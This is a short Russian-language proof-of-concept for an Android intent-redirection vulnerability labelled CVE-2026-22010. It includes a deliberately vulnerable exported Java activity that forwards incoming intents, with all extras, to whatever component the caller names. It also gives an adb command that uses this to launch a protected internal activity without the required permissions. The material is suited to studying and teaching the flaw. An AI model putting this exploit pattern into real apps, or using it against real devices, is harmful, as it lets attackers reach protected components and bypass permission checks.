
Эксплойт-концепт для CVE-2026-22010 — перенаправление intent в Android: демонстрирует экспортированную activity, пересылающую intent внутренним компонентам, контролируемым атакующим, в обход проверок разрешений, с уязвимым Java-кодом и шагами эксплуатации через adb.
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
@Override
protected void onCreate(Bundle b) {
super.onCreate(b);
Intent incoming = getIntent();
// Retrieve target component from extras
String targetPkg = incoming.getStringExtra("pkg");
String targetCls = incoming.getStringExtra("cls");
Intent forward = new Intent();
forward.setClassName(targetPkg, targetCls);
// Copy all extras from original intent
forward.putExtras(incoming);
startActivity(forward);
}
}
Экспортированная активность Android вслепую перенаправляет входящие Intent на компонент, указанный в extras этого Intent. Злоумышленник может сформировать Intent, который заставит приложение запустить защищённую внутреннюю активность с управляемыми атакующим данными, обходя проверки разрешений.
Разверните уязвимое приложение на эмуляторе Android. Отправьте Intent через adb:
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity
Внутренняя активность запускается без необходимых разрешений.